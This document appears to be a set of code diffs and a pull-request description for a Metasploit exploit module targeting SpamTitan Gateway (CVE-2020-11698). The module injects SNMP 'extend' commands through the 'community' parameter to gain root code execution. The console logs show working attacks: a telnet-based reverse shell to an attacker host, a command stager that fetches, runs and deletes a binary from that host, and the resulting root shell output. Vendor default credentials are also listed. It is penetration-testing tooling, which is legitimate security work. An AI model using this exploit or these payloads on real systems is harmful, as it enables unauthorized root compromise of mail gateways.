               'Platform' => 'bsd',
               'Arch' => [ARCH_X86],
               'DefaultOptions' => { 'PAYLOAD' => 'bsd/x86/shell_reverse_tcp' },
+              'Payload' => {
+                'BadChars' => "'#",
+                'Space' => 450
+              },
               'Type' => :bsd_dropper
             ]
           ],
@@ -94,41 +101,117 @@ class MetasploitModule < Msf::Exploit::Remote
       [
         Opt::RPORT(80),
         OptString.new('TARGETURI', [ true, 'The base path to SpamTitan', '/' ]),
-        OptString.new('COMMUNITY', [ false, 'SNMP Community String. If not set, a random string will be used by default' ]),
-        OptString.new('IP', [ false, 'This host source IP. This IP will be allowed to query the injected random community. If not set, and LHOST has been set, it will be used by default. Otherwise ...' ]),
+        OptString.new(
+          'USERNAME',
+          [
+            false,
+            'Username to authenticate, if required (depending on SpamTitan Gateway version)',
+            'admin'
+          ]
+        ),
+        OptString.new(
+          'PASSWORD',
+          [
+            false,
+            'Password to authenticate, if required (depending on SpamTitan Gateway version)',
+            'hiadmin'
+          ]
+        ),
+        OptString.new(
+          'COMMUNITY',
+          [
+            false,
+            'The SNMP Community String to use (random string by default)',
+            Rex::Text.rand_text_alpha(8)
+          ]
+        ),
+        OptString.new(
+          'ALLOWEDIP',
+          [
+            false,
+            'The IP address that will be allowed to query the injected `extend` '\
+            'command. This IP will be added to the SNMP configuration file on the '\
+            'target. This is tipically this host IP address, but can be different if '\
+            'your are in a NAT\'ed network. If not set, `LHOST` will be used '\
+            'instead. If `LHOST` is not set, it will default to `127.0.0.1`.'
+          ]
+        ),
       ], self.class
     )
   end
 
   def check
-    begin
-      snmp_x_uri = normalize_uri(target_uri.path, 'snmp-x.php')
-      vprint_status("Check if #{snmp_x_uri} exists")
+    snmp_x_uri = normalize_uri(target_uri.path, 'snmp-x.php')
+    vprint_status("Check if #{snmp_x_uri} exists")
+    res = send_request_cgi(
+      'uri' => snmp_x_uri,
+      'method' => 'GET'
+    )
+
+    if res.nil?
+      return Exploit::CheckCode::Unknown.new(
+        "Could not connect to SpamTitan vulnerable page (#{snmp_x_uri}) - no response"
+      )
+    end
+
+    if res.code == 302
+      vprint_status(
+        'This version of SpamTitan requires authentication. Trying with the '\
+        'provided credentials.'
+      )
+      res = send_request_cgi(
+        'uri' => '/index.php',
+        'method' => 'POST',
+        'vars_post' => {
+          'jaction' => 'none',
+          'language' => 'en_US',
+          'address' => datastore['USERNAME'],
+          'passwd' => datastore['PASSWORD']
+        }
+      )
+      if res.nil?
+        return Exploit::CheckCode::Safe.new("Unable to authenticate - no response")
+      end
+      if res.code == 200 && res.body =~ /Invalid username or password/
+        return Exploit::CheckCode::Safe.new(
+          "Unable to authenticate - Invalid username or password"
+        )
+      end
+      unless res.code == 302
+        return Exploit::CheckCode::Unknown.new(
+          "Unable to authenticate - Unexpected HTTP response code: #{res.code}"
+        )
+      end
+
+      # For whatever reason, the web application sometimes returns multiple
+      # PHPSESSID cookies and only the last one is valid. So, make sure only
+      # the valid one is part of the cookie_jar.
+      cookies = res.get_cookies.split(' ')
+      php_session = cookies.select { |cookie| cookie.starts_with?('PHPSESSID=') }.last
+      cookie_jar.clear
+      cookie_jar.add(php_session)
+      remaining_cookies = cookies.delete_if { |cookie| cookie.starts_with?('PHPSESSID=') }
+      cookie_jar.merge(remaining_cookies)
+
       res = send_request_cgi(
         'uri' => snmp_x_uri,
         'method' => 'GET'
       )
-
-      if res.nil?
-        fail_with(Failure::Unreachable,
-                  "#{peer} - Could not connect to SpamTitan vulnerable page "\
-                  "(#{snmp_x_uri}) - no response")
-      end
-      unless res.code == 200
-        fail_with(Failure::UnexpectedReply,
-                  "#{peer} - Could not connect to SpamTitan vulnerable page "\
-                  "(#{snmp_x_uri}) - unexpected HTTP response code: #{res.code}")
-      end
-    rescue ::Rex::ConnectionError => e
-      print_error("Connection error: #{e}")
-      fail_with(Failure::Unreachable,
-                "#{peer} - Could not connect to SpamTitan "\
-                "vulnerable page (#{snmp_x_uri})")
     end
 
-    # TODO: add more check to make sure it is vulnerable
+    unless res.code == 200
+      return Exploit::CheckCode::Safe.new(
+        "Could not connect to SpamTitan vulnerable page (#{snmp_x_uri}) - "\
+        "unexpected HTTP response code: #{res.code}"
+      )
+    end
 
     Exploit::CheckCode::Appears
+  rescue ::Rex::ConnectionError => e
+    vprint_error("Connection error: #{e}")
+    return Exploit::CheckCode::Unknown.new(
+      "Could not connect to SpamTitan vulnerable page (#{snmp_x_uri})"
+    )
   end
 
   def exploit
@@ -141,35 +224,106 @@ class MetasploitModule < Msf::Exploit::Remote
     fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
   end
 
-  def execute_command(cmd, _opts = {})
-    if target['Type'] == :bsd_dropper
-      cmd = "/bin/sh -c '#{[cmd.gsub('\'', '\\\\\'').gsub('\\', '\\\\\\')].shelljoin}'#"
-    end
+  def inject_payload(community)
     snmp_x_uri = normalize_uri(target_uri.path, 'snmp-x.php')
-    datastore['COMMUNITY'] ||= Rex::Text.rand_text_alpha(8)
-    ip = datastore['IP'] || datastore['LHOST'] || '127.0.0.1'
-    name = Rex::Text.rand_text_alpha(8)
+    print_status("Send a request to #{snmp_x_uri} and inject the payload")
+
+    post_params = {
+      'jaction' => 'saveAll',
+      'contact' => 'CONTACT',
+      'name' => 'SpamTitan',
+      'location' => 'LOCATION',
+      'community' => community
+    }
+
+    # First, grab the CSRF token, if any (depending on the version)
+    res = send_request_cgi(
+      'uri' => '/snmp.php',
+      'method' => 'GET'
+    )
+    if res.code == 200
+      doc = ::Nokogiri::HTML(res.body)
+      csrf_name = doc.xpath('//input[@name=\'CSRFName\']/attribute::value').first&.value
+      csrf_token = doc.xpath('//input[@name=\'CSRFToken\']/attribute::value').first&.value
+      if csrf_name && csrf_token
+        print_status("CSRF token found")
+        post_params['CSRFName'] = csrf_name
+        post_params['CSRFToken'] = csrf_token
+      end
+    end
+
     res = send_request_cgi(
       'uri' => snmp_x_uri,
       'method' => 'POST',
-      'vars_post' => {
-        'jaction' => 'saveAll',
-        'contact' => 'CONTACT',
-        'name' => 'SpamTitan',
-        'location' => 'LOCATION',
-        # Add our IP as allowed to query the injected 'dummy' community
-        # Also add the payload in a new line (%0a) of the snmpd.conf file
-        'community' => "#{datastore['COMMUNITY']}\" #{ip}\nextend #{name} #{cmd}"
-      }
+      'vars_post' => post_params
     )
-    # Send an SNMP Get-Request to trigger the payload
-    # RPORT needs to be set since the default value is set to the web service port
-    connect_snmp(true, 'RPORT' => 161)
+    if res.nil?
+      fail_with(Failure::Unreachable,
+                "#{peer} - Unable to inject the payload - no response")
+    end
+    unless res.code == 200
+      fail_with(Failure::UnexpectedReply,
+                "#{peer} - Unable to inject the payload - unexpected HTTP response "\
+                "code: #{res.code}")
+    end
     begin
-      snmp.get("1.3.6.1.4.1.8072.1.3.2.3.1.1.8.#{name.bytes.join('.')}")
-    rescue SNMP::RequestTimeout, IOError
-      # not expecting response here, so timeout is likely to happen
+      json_res = JSON.parse(res.body)['success']
+    rescue JSON::ParserError
+      json_res = nil
+    end
+    unless json_res
+      fail_with(Failure::UnexpectedReply,
+                "#{peer} - Unable to inject the payload - Unknown error: #{res.body}")
     end
   end
 
+  def trigger_payload(name)
+    print_status('Send an SNMP Get-Request to trigger the payload')
+
+    # RPORT needs to be specified since the default value is set to the web
+    # service port.
+    connect_snmp(true, 'RPORT' => 161)
+    begin
+      res = snmp.get("1.3.6.1.4.1.8072.1.3.2.3.1.1.8.#{name.bytes.join('.')}")
+      msg = "SNMP Get-Request response (status=#{res.error_status}): "\
+            "#{res.each_varbind.map(&:value).join('|')}"
+      if res.error_status == :noError
+        vprint_good(msg)
+      else
+        vprint_error(msg)
+      end
+    rescue SNMP::RequestTimeout, IOError
+      # not always expecting a response here, so timeout is likely to happen
+    end
+  end
+
+  def execute_command(cmd, _opts = {})
+    if target['Type'] == :bsd_dropper
+      # 'tcsh' is the default shell on FreeBSD
+      # Also, make sure it runs in background (&) to avoid blocking
+      cmd = "/bin/tcsh -c '#{[cmd.gsub('\'', '\\\\\'').gsub('\\', '\\\\\\')].shelljoin}&'#"
+    end
+    name = Rex::Text.rand_text_alpha(8)
+    ip = datastore['ALLOWEDIP'] || datastore['LHOST'] || '127.0.0.1'
+    if ip == '127.0.0.1'
+      print_warning(
+        'Neither ALLOWEDIP and LHOST has been set and 127.0.0.1 will be used'\
+        'instead. It will probably fail to trigger the payload.'
+      )
+    end
+
+    # The injected payload consists of two lines:
+    # 1. the community string and the IP address allowed to query this
+    #    community string
+    # 2. the `extend` keyword, the name token used to trigger the payload
+    #    and the actual command to execute
+    community = "#{atastore['COMMUNITY']}\" #{ip}\nextend #{name} #{cmd}"
+    inject_payload(community)
+
+    # The previous HTTP POST request made the application restart the SNMPD
+    # service. So, wait a bit to make sure it is running.
+    sleep(2)
+
+    trigger_payload(name)
+  end
 end

--- a/modules/exploits/freebsd/webapp/spamtitan_unauth_rce.rb
+++ b/modules/exploits/freebsd/webapp/spamtitan_unauth_rce.rb
@@ -45,14 +45,15 @@ class MetasploitModule < Msf::Exploit::Remote
             [ 'URL', 'https://www.titanhq.com/spamtitan/spamtitangateway/'],
             [ 'CVE', '2020-11698']
           ],
-        'CmdStagerFlavor' => [:fetch, :wget, :curl],
+        'CmdStagerFlavor' => %i[fetch wget curl],
         'Payload' => {
           'DisableNops' => true
         },
         'Targets' =>
+        [
           [
-            [
-              'Unix In-Memory',
+            'Unix In-Memory',
+            {
               'Platform' => 'unix',
               'Arch' => ARCH_CMD,
               'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse' },
@@ -64,9 +65,11 @@ class MetasploitModule < Msf::Exploit::Remote
                 'Space' => 470
               },
               'Type' => :unix_memory
-            ],
-            [
-              'FreeBSD Dropper (x64)',
+            }
+          ],
+          [
+            'FreeBSD Dropper (x64)',
+            {
               'Platform' => 'bsd',
               'Arch' => [ARCH_X64],
               'DefaultOptions' => { 'PAYLOAD' => 'bsd/x64/shell_reverse_tcp' },
@@ -75,9 +78,11 @@ class MetasploitModule < Msf::Exploit::Remote
                 'Space' => 450
               },
               'Type' => :bsd_dropper
-            ],
-            [
-              'FreeBSD Dropper (x86)',
+            }
+          ],
+          [
+            'FreeBSD Dropper (x86)',
+            {
               'Platform' => 'bsd',
               'Arch' => [ARCH_X86],
               'DefaultOptions' => { 'PAYLOAD' => 'bsd/x86/shell_reverse_tcp' },
@@ -86,8 +91,9 @@ class MetasploitModule < Msf::Exploit::Remote
                 'Space' => 450
               },
               'Type' => :bsd_dropper
-            ]
-          ],
+            }
+          ]
+        ],
         'DisclosureDate' => '2020-04-17',
         'DefaultTarget' => 0,
         'Notes' => {
@@ -170,11 +176,12 @@ class MetasploitModule < Msf::Exploit::Remote
         }
       )
       if res.nil?
-        return Exploit::CheckCode::Safe.new("Unable to authenticate - no response")
+        return Exploit::CheckCode::Safe.new('Unable to authenticate - no response')
       end
+
       if res.code == 200 && res.body =~ /Invalid username or password/
         return Exploit::CheckCode::Safe.new(
-          "Unable to authenticate - Invalid username or password"
+          'Unable to authenticate - Invalid username or password'
         )
       end
       unless res.code == 302
@@ -246,7 +253,7 @@ class MetasploitModule < Msf::Exploit::Remote
       csrf_name = doc.xpath('//input[@name=\'CSRFName\']/attribute::value').first&.value
       csrf_token = doc.xpath('//input[@name=\'CSRFToken\']/attribute::value').first&.value
       if csrf_name && csrf_token
-        print_status("CSRF token found")
+        print_status('CSRF token found')
         post_params['CSRFName'] = csrf_name
         post_params['CSRFToken'] = csrf_token
       end
@@ -317,7 +324,7 @@ class MetasploitModule < Msf::Exploit::Remote
     #    community string
     # 2. the `extend` keyword, the name token used to trigger the payload
     #    and the actual command to execute
-    community = "#{atastore['COMMUNITY']}\" #{ip}\nextend #{name} #{cmd}"
+    community = "#{datastore['COMMUNITY']}\" #{ip}\nextend #{name} #{cmd}"
     inject_payload(community)
 
     # The previous HTTP POST request made the application restart the SNMPD

--- a/modules/exploits/freebsd/webapp/spamtitan_unauth_rce.rb
+++ b/modules/exploits/freebsd/webapp/spamtitan_unauth_rce.rb
@@ -15,73 +15,76 @@ class MetasploitModule < Msf::Exploit::Remote
     super(
       update_info(
         info,
-        'Name'           => 'SpamTitan Unauthenticated RCE',
+        'Name' => 'SpamTitan Unauthenticated RCE',
         # TODO: Description is straight from the POC, update it
-        'Description'    => %q(
-        TitanHQ
-        SpamTitan Gateway is a powerful Anti-Spam appliance that equips network
-        administrators with extensive tools to control mail flow and protect
-        against unwanted email and malware. Improper input sanitization of the
-        parameter "community" on the page snmp-x.php would allow a remote
-        attacker to inject command directives into the file snmpd.conf. This
-        would allow executing commands on the target server by by injecting an
-        "extend" or "exec" SNMPD directive and querying the snmp daemon of the
-        server for the correct OID.
-        ),
-        'License'        => MSF_LICENSE,
-        'Author'         =>
+        'Description' => %q{
+          TitanHQ
+          SpamTitan Gateway is a powerful Anti-Spam appliance that equips network
+          administrators with extensive tools to control mail flow and protect
+          against unwanted email and malware. Improper input sanitization of the
+          parameter "community" on the page snmp-x.php would allow a remote
+          attacker to inject command directives into the file snmpd.conf. This
+          would allow executing commands on the target server by by injecting an
+          "extend" or "exec" SNMPD directive and querying the snmp daemon of the
+          server for the correct OID.
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
           [
             'Christophe De La Fuente', # msf module
             'Felipe Molina' # original PoC
           ],
-        'References'     =>
+        'References' =>
           [
             [ 'EDB', '48856' ],
             [ 'URL', 'https://www.titanhq.com/spamtitan/spamtitangateway/'],
             [ 'CVE', '2020-11698']
           ],
-        'Platform'       => %w[php freebsd],
-        'Arch'           => [ARCH_PHP, ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Platform' => %w[php freebsd],
+        'Arch' => [ARCH_PHP, ARCH_CMD, ARCH_X86, ARCH_X64],
         'CmdStagerFlavor' => :wget,
         'Payload' => {
-          'DisableNops'    => true,
+          'DisableNops' => true
         },
-        'Targets'        =>
+        'Targets' =>
           [
-            ['Unix In-Memory',
-              'Platform'       => 'unix',
-              'Arch'           => ARCH_CMD,
-              'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse'},
+            [
+              'Unix In-Memory',
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse' },
               'Payload' => {
-                'BadChars'       => "\\'#",
-                'Encoder'        => 'cmd/perl',
+                'BadChars' => "\\'#",
+                'Encoder' => 'cmd/perl',
                 'PrependEncoder' => '/bin/sh -c \'',
-                'AppendEncoder'  => '\'#',
-                'Space'          => 470
+                'AppendEncoder' => '\'#',
+                'Space' => 470
               },
-              'Type'           => :unix_memory
+              'Type' => :unix_memory
             ],
-            ['FreeBSD Dropper (x64)',
-              'Platform'       => 'bsd',
-              'Arch'           => [ARCH_X64],
-              'DefaultOptions' => {'PAYLOAD' => 'bsd/x64/shell_reverse_tcp'},
+            [
+              'FreeBSD Dropper (x64)',
+              'Platform' => 'bsd',
+              'Arch' => [ARCH_X64],
+              'DefaultOptions' => { 'PAYLOAD' => 'bsd/x64/shell_reverse_tcp' },
               'Payload' => {
-                'BadChars'       => "'#",
-                'Space'          => 450
+                'BadChars' => "'#",
+                'Space' => 450
               },
-              'Type'           => :bsd_dropper
+              'Type' => :bsd_dropper
             ],
-            ['FreeBSD Dropper (x86)',
-              'Platform'       => 'bsd',
-              'Arch'           => [ARCH_X86],
-              'DefaultOptions' => {'PAYLOAD' => 'bsd/x86/shell_reverse_tcp'},
-              'Type'           => :bsd_dropper
+            [
+              'FreeBSD Dropper (x86)',
+              'Platform' => 'bsd',
+              'Arch' => [ARCH_X86],
+              'DefaultOptions' => { 'PAYLOAD' => 'bsd/x86/shell_reverse_tcp' },
+              'Type' => :bsd_dropper
             ]
           ],
         'DisclosureDate' => '2020-04-17',
-        'DefaultTarget'  => 0,
-        'Notes'          => {
-          'Stability'   => [CRASH_SAFE],
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
           'Reliability' => [REPEATABLE_SESSION],
           'SideEffects' => [CONFIG_CHANGES, ARTIFACTS_ON_DISK]
         }
@@ -102,28 +105,25 @@ class MetasploitModule < Msf::Exploit::Remote
       snmp_x_uri = normalize_uri(target_uri.path, 'snmp-x.php')
       vprint_status("Check if #{snmp_x_uri} exists")
       res = send_request_cgi(
-        'uri'       => snmp_x_uri,
-        'method'    => 'GET'
+        'uri' => snmp_x_uri,
+        'method' => 'GET'
       )
 
       if res.nil?
         fail_with(Failure::Unreachable,
-          "#{peer} - Could not connect to SpamTitan vulnerable page "\
-          "(#{snmp_x_uri}) - no response"
-        )
+                  "#{peer} - Could not connect to SpamTitan vulnerable page "\
+                  "(#{snmp_x_uri}) - no response")
       end
       unless res.code == 200
         fail_with(Failure::UnexpectedReply,
-          "#{peer} - Could not connect to SpamTitan vulnerable page "\
-          "(#{snmp_x_uri}) - unexpected HTTP response code: #{res.code}"
-        )
+                  "#{peer} - Could not connect to SpamTitan vulnerable page "\
+                  "(#{snmp_x_uri}) - unexpected HTTP response code: #{res.code}")
       end
     rescue ::Rex::ConnectionError => e
       print_error("Connection error: #{e}")
       fail_with(Failure::Unreachable,
-        "#{peer} - Could not connect to SpamTitan "\
-        "vulnerable page (#{snmp_x_uri})"
-      )
+                "#{peer} - Could not connect to SpamTitan "\
+                "vulnerable page (#{snmp_x_uri})")
     end
 
     # TODO: add more check to make sure it is vulnerable
@@ -141,7 +141,7 @@ class MetasploitModule < Msf::Exploit::Remote
     fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
   end
 
-  def execute_command(cmd, opts = {})
+  def execute_command(cmd, _opts = {})
     if target['Type'] == :bsd_dropper
       cmd = "/bin/sh -c '#{[cmd.gsub('\'', '\\\\\'').gsub('\\', '\\\\\\')].shelljoin}'#"
     end
@@ -150,13 +150,13 @@ class MetasploitModule < Msf::Exploit::Remote
     ip = datastore['IP'] || datastore['LHOST'] || '127.0.0.1'
     name = Rex::Text.rand_text_alpha(8)
     res = send_request_cgi(
-      'uri'           => snmp_x_uri,
-      'method'        => 'POST',
-      'vars_post'     => {
-        'jaction'   => 'saveAll',
-        'contact'   => 'CONTACT',
-        'name'      => 'SpamTitan',
-        'location'  => 'LOCATION',
+      'uri' => snmp_x_uri,
+      'method' => 'POST',
+      'vars_post' => {
+        'jaction' => 'saveAll',
+        'contact' => 'CONTACT',
+        'name' => 'SpamTitan',
+        'location' => 'LOCATION',
         # Add our IP as allowed to query the injected 'dummy' community
         # Also add the payload in a new line (%0a) of the snmpd.conf file
         'community' => "#{datastore['COMMUNITY']}\" #{ip}\nextend #{name} #{cmd}"

--- a/modules/exploits/freebsd/webapp/spamtitan_unauth_rce.rb
+++ b/modules/exploits/freebsd/webapp/spamtitan_unauth_rce.rb
@@ -21,8 +21,8 @@ class MetasploitModule < Msf::Exploit::Remote
           unwanted emails and malwares. This module exploits an improper input
           sanitization in versions 7.01, 7.02, 7.03 and 7.07 to inject command directives
           into the SNMP configuration file and get remote code execution as root. Note
-          that only version 7.03 needs authentication, whereas no authentication is
-          required for versions 7.01, 7.02 and 7.07.
+          that only version 7.03 needs authentication and no authentication is required
+          for versions 7.01, 7.02 and 7.07.
 
           First, it sends an HTTP POST request to the `snmp-x.php` page with an `SNMPD`
           command directives (`extend` + command) passed to the `community` parameter.


### PR DESCRIPTION
TitanHQ SpamTitan Gateway is an anti-spam appliance that protects against unwanted emails and malwares. This module exploits an improper input sanitization in versions 7.01, 7.02, 7.03 and 7.07 to inject command directives into the SNMP configuration file and get remote code execution as root. Note that only version 7.03 needs authentication and no authentication is required for versions 7.01, 7.02 and 7.07.

First, it sends an HTTP POST request to the `snmp-x.php` page with an `SNMPD` command directives (`extend` + command) passed to the `community` parameter. This payload is then added to `snmpd.conf` by the application. Finally, the module triggers the execution of this command by querying the SNMP server for the correct OID.

This exploit module has been successfully tested against versions 7.01, 7.02, 7.03, and 7.07.

## Installation

A demo version of the vulnerable application can be downloaded [here](https://www.titanhq.com/signup/?product_type=spamtitangateway). Since the latest version of SpamTitan Gateway has this vulnerability fixed and no demo of the vulnerable versions are available for download, the previous major release demo has to be used and updates have to be installed manually.

Installation steps:
1. Download SpamTitan Gateway version 6 demo `.ova` image: https://stdownload.titanhq.com/vmware/SpamTitan-6-amd64.ova
2. Import it to your favorite virtualization software and start it
3. Access the SpamTitan web user interface from the appliance IP. This IP is usually displayed on the welcome page once the virtual machine has boot up.
4. Login with the default credentials:
    - username: `admin`
    - password: `hiadmin`
5. Go to `System Setup` > `System Updates` and click `Start` in the `Check for Updates Now` section. It will download all available update patches.
6. From the `Available Updates` section, choose the version you want to test and click the `install` button in front of it.

## Verification Steps

1. Install the application (see Installation)
2. Start msfconsole
3. Do: `use exploit/freebsd/webapp/spamtitan_unauth_rce`
4. Do: `set RHOSTS <ip>`
5. Do: `set LHOST <ip>`
6. Do: `run`
7. You should get a shell.

## Scenarios
<details>
<summary>SpamTitan Gateway v7.01 - target 0 (in-memory command)</summary>

```
msf6 > use exploit/freebsd/webapp/spamtitan_unauth_rce
[*] Using configured payload cmd/unix/reverse
msf6 exploit(freebsd/webapp/spamtitan_unauth_rce) > set LHOST 172.16.60.1
LHOST => 172.16.60.1
msf6 exploit(freebsd/webapp/spamtitan_unauth_rce) > set RHOSTS 172.16.60.101
RHOSTS => 172.16.60.101
msf6 exploit(freebsd/webapp/spamtitan_unauth_rce) > set verbose true
verbose => true
msf6 exploit(freebsd/webapp/spamtitan_unauth_rce) > show options

Module options (exploit/freebsd/webapp/spamtitan_unauth_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   ALLOWEDIP                   no        The IP address that will be allowed to query the injected `extend` command. This IP will be added to the SNMP configuration file on the target. This is tipically this host IP address, but can be different if your are in a NAT'ed network. If not set, `LHOST` will be used instead. If `LHOST` is not set, it will default to `127.0.0.1`.
   COMMUNITY  BTMlXXtt         no        The SNMP Community String to use (random string by default)
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RETRIES    1                yes       SNMP Retries
   RHOSTS     172.16.60.101    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (UDP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The base path to SpamTitan
   TIMEOUT    1                yes       SNMP Timeout
   URIPATH                     no        The URI to use for this exploit (default is random)
   VERSION    1                yes       SNMP Version <1/2c>
   VHOST                       no        HTTP server virtual host


Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.16.60.1      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Unix In-Memory


msf6 exploit(freebsd/webapp/spamtitan_unauth_rce) > check

[*] Check if /snmp-x.php exists
[*] 172.16.60.101:80 - The target appears to be vulnerable.
msf6 exploit(freebsd/webapp/spamtitan_unauth_rce) > run

[+] sh -c '(sleep 4511|telnet 172.16.60.1 4444|while : ; do sh && break; done 2>&1|telnet 172.16.60.1 4444 >/dev/null 2>&1 &)'
[*] Started reverse TCP double handler on 172.16.60.1:4444
[*] Executing automatic check (disable AutoCheck to override)
[*] Check if /snmp-x.php exists
[+] The target appears to be vulnerable.
[*] Send a request to /snmp-x.php and inject the payload: /bin/tcsh -c 'perl -e system -e pack -e qq,H244,,qq,7368202d63202728736c65657020333735347c74656c6e6574203137322e31362e36302e3120343434347c7768696c65203a203b20646f20736820262620627265616b3b20646f6e6520323e26317c74656c6e6574203137322e31362e36302e312034343434203e2f6465762f6e756c6c20323e263120262927,'#
[*] Send an SNMP Get-Request to trigger the payload
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo ldqlDor8slARqZ0Q;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "Connected: not found\r\nEscape: not found\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (172.16.60.1:4444 -> 172.16.60.101:38973) at 2020-10-28 15:56:55 +0100

id
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)
uname -a
FreeBSD spamtitan.example.com 10.1-RELEASE-p8 FreeBSD 10.1-RELEASE-p8 #1: Wed May  6 10:36:09 IST 2015     root@stbuild-10-amd64.spamtitan.com:/usr/obj/usr/src/sys/SPAMTITAN  amd64
ifconfig
em0: flags=8843<UP,BROADCAST,RUNNING,SIMPLEX,MULTICAST> metric 0 mtu 1500
	options=9b<RXCSUM,TXCSUM,VLAN_MTU,VLAN_HWTAGGING,VLAN_HWCSUM>
	ether 00:0c:29:cb:1d:73
	inet 172.16.60.101 netmask 0xffffff00 broadcast 172.16.60.255
	nd6 options=29<PERFORMNUD,IFDISABLED,AUTO_LINKLOCAL>
	media: Ethernet autoselect (1000baseT <full-duplex>)
	status: active
lo0: flags=8049<UP,LOOPBACK,RUNNING,MULTICAST> metric 0 mtu 16384
	options=600003<RXCSUM,TXCSUM,RXCSUM_IPV6,TXCSUM_IPV6>
	inet6 ::1 prefixlen 128
	inet6 fe80::1%lo0 prefixlen 64 scopeid 0x2
	inet 127.0.0.1 netmask 0xff000000
	inet 127.0.0.2 netmask 0xffffffff
	inet 127.0.0.3 netmask 0xffffffff
	nd6 options=21<PERFORMNUD,AUTO_LINKLOCAL>
^C
Abort session 1? [y/N]  y

[*] 172.16.60.101 - Command shell session 1 closed.  Reason: User exit
```

</details>

<details>
<summary>SpamTitan Gateway v7.01 - target 1 (FreeBSD Dropper - x64)</summary>

```
msf6 exploit(freebsd/webapp/spamtitan_unauth_rce) > set target 1
target => 1
msf6 exploit(freebsd/webapp/spamtitan_unauth_rce) > show options

Module options (exploit/freebsd/webapp/spamtitan_unauth_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   ALLOWEDIP                   no        The IP address that will be allowed to query the injected `extend` command. This IP will be added to the SNMP configuration file on the target. This is tipically this host IP address, but can be different if your are in a NAT'ed network. If not set, `LHOST` will be used instead. If `LHOST` is not set, it will default to `127.0.0.1`.
   COMMUNITY  BTMlXXtt         no        The SNMP Community String to use (random string by default)
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RETRIES    1                yes       SNMP Retries
   RHOSTS     172.16.60.101    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (UDP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The base path to SpamTitan
   TIMEOUT    1                yes       SNMP Timeout
   URIPATH                     no        The URI to use for this exploit (default is random)
   VERSION    1                yes       SNMP Version <1/2c>
   VHOST                       no        HTTP server virtual host


Payload options (bsd/x64/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   CMD    /bin/sh          yes       The command string to execute
   LHOST  172.16.60.1      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   FreeBSD Dropper (x64)


msf6 exploit(freebsd/webapp/spamtitan_unauth_rce) > run

[*] Started reverse TCP handler on 172.16.60.1:4444
[*] Executing automatic check (disable AutoCheck to override)
[*] Check if /snmp-x.php exists
[+] The target appears to be vulnerable.
[*] Using URL: http://0.0.0.0:8080/AW6l3kjAO2B
[*] Local IP: http://192.168.1.75:8080/AW6l3kjAO2B
[*] Generated command stager: ["fetch -qo /tmp/BrnPtJiQ http://172.16.60.1:8080/AW6l3kjAO2B", "chmod +x /tmp/BrnPtJiQ", "/tmp/BrnPtJiQ", "rm -f /tmp/BrnPtJiQ"]
[*] Send a request to /snmp-x.php and inject the payload: /bin/tcsh -c 'fetch\ -qo\ /tmp/BrnPtJiQ\ http://172.16.60.1:8080/AW6l3kjAO2B&'#
[*] Send an SNMP Get-Request to trigger the payload
[*] Client 172.16.60.101 (fetch libfetch/2.0) requested /AW6l3kjAO2B
[*] Sending payload to 172.16.60.101 (fetch libfetch/2.0)
[+] SNMP Get-Request response (status=noError): [1] 16531
[*] Command Stager progress -  52.21% done (59/113 bytes)
[*] Send a request to /snmp-x.php and inject the payload: /bin/tcsh -c 'chmod\ \+x\ /tmp/BrnPtJiQ&'#
[*] Send an SNMP Get-Request to trigger the payload
[+] SNMP Get-Request response (status=noError): [1] 16561
[*] Command Stager progress -  71.68% done (81/113 bytes)
[*] Send a request to /snmp-x.php and inject the payload: /bin/tcsh -c '/tmp/BrnPtJiQ&'#
[*] Send an SNMP Get-Request to trigger the payload
[+] SNMP Get-Request response (status=noError): [1] 16590
[*] Command shell session 2 opened (172.16.60.1:4444 -> 172.16.60.101:16026) at 2020-10-28 15:57:34 +0100
[*] Command Stager progress -  83.19% done (94/113 bytes)
[*] Send a request to /snmp-x.php and inject the payload: /bin/tcsh -c 'rm\ -f\ /tmp/BrnPtJiQ&'#
[*] Send an SNMP Get-Request to trigger the payload
[+] SNMP Get-Request response (status=noError): [1] 16619
[*] Command Stager progress - 100.00% done (113/113 bytes)
[*] Server stopped.

id
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)
uname -a
